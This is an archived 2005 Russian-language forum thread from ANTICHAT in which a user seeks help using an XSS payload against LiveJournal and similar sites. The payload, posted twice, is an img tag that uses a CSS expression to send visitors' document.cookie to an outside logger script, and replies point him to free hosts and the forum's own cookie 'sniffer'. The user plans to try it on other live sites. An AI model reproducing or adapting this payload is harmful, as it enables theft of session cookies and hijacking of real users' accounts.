ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

20.08.2005, 15:53
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме: 670862
Репутация:
54
|
|
Видео Zadoxlik'a по XSS
Просмотрел я видео по XSS и возникли у меня такие вопросы: как настроить сплойт, чтобы куки присылались на мой txt-документ на народе? Исходный текст сплойта с видео:
<*img src="http://zadoxlik.net.ru/lj.php" style="top:expres/**/sion(eval(this.sas));"
sas="this.src='http://zadoxlik.net.ru/lj.php?'+document.cookie;this.sas=null" alt=''*>
(без звездочек)
Последний раз редактировалось Ван; 20.08.2005 в 15:57..
|
|
|

20.08.2005, 17:16
|
|
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме: 1535446
Репутация:
182
|
|
Учить js надо.
А нахера на народе?
На народе не получится...
|
|
|

20.08.2005, 17:36
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме: 670862
Репутация:
54
|
|
Мне не обязательно на народе. Главное чтоб мне пришло.) На каком бесплатном хостинге получится?
|
|
|

20.08.2005, 18:23
|
|
Banned
Регистрация: 05.08.2005
Сообщений: 8
Провел на форуме: 400252
Репутация:
0
|
|
Да, если можно, то объясните асё по-подробней 
|
|
|

20.08.2005, 21:08
|
|
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме: 3369632
Репутация:
749
|
|
Сообщение от Ван
Просмотрел я видео по XSS и возникли у меня такие вопросы: как настроить сплойт, чтобы куки присылались на мой txt-документ на народе? Исходный текст сплойта с видео:
<*img src="http://zadoxlik.net.ru/lj.php" style="top:expres/**/sion(eval(this.sas));"
sas="this.src='http://zadoxlik.net.ru/lj.php?'+document.cookie;this.sas=null" alt=''*>
(без звездочек)
Никак. Куки пересылаются GET запросом к скрипту, где в QUERY_STRING (строка с параметрами запроса) располагается содержимое куков. Скрипт принимает их и записывает в файл. Т.к. на народе серверные скрипты размещать нельзя, то и сниффер там установить тоже нельзя.
|
|
|

20.08.2005, 22:39
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме: 2386719
Репутация:
1384
|
|
Сообщение от Ван
Мне не обязательно на народе. Главное чтоб мне пришло.) На каком бесплатном хостинге получится?
Можеш на Holm.ru сделать себе сниффер
Кроме этого можеш использовать сниффер античата и сделать подписку и все придет тебе на мыло.
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|

21.08.2005, 00:48
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме: 670862
Репутация:
54
|
|
Ну раз на народе нельзя, то первое время поюзаю античатовский сниффер. Вот так код верен?
<*img src="http://antichat.ru/sniff/log.php" style="top:expres/**/sion(eval(this.sas));"
sas="this.src='http://antichat.ru/sniff/log.php?'+document.cookie;this.sas=null" alt=''*>
(без звездочек)
|
|
|

21.08.2005, 10:48
|
|
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме: 3369632
Репутация:
749
|
|
В ЖЖ сейчас это прикрыли
|
|
|

21.08.2005, 12:08
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме: 670862
Репутация:
54
|
|
Ну а сплойт верный? Я ещё может на дайри попробую.
|
|
|

27.08.2005, 00:51
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме: 2050916
Репутация:
0
|
|
Сообщение от Ван
Ну а сплойт верный?
Неверный.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|